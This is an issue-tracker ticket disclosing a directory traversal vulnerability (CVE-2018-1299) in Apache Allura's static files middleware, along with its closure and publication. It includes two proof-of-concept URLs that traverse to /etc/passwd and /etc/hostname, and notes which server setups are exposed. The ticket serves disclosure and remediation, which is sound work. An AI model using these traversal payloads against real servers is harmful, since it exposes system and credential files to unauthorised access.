#8180 StaticFilesMiddleware allows directory traversal

v1.8.0
closed
security (31)
General
nobody
2018-02-06
2018-01-29
No

From reporter:

The vulnerability allows unauthenticated attackers to retrieve
arbitrary files from the Allura web server.

PoC URsL:
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname


The %2F does't seem necessary in my testing. The paster, nginx and apache/mod_wsgi servers seem to protect against this, but gunicorn (which we recommend for production) permits the vulnerability.

This has been assigned CVE-2018-1299

Discussion

  • Dave Brondsema

    Dave Brondsema - 2018-02-01
    • status: in-progress --> closed
     
  • Dave Brondsema

    Dave Brondsema - 2018-02-05
    • Milestone: unreleased --> v1.8.0
     
  • Dave Brondsema

    Dave Brondsema - 2018-02-06
    • private: Yes --> No
     

Log in to post a comment.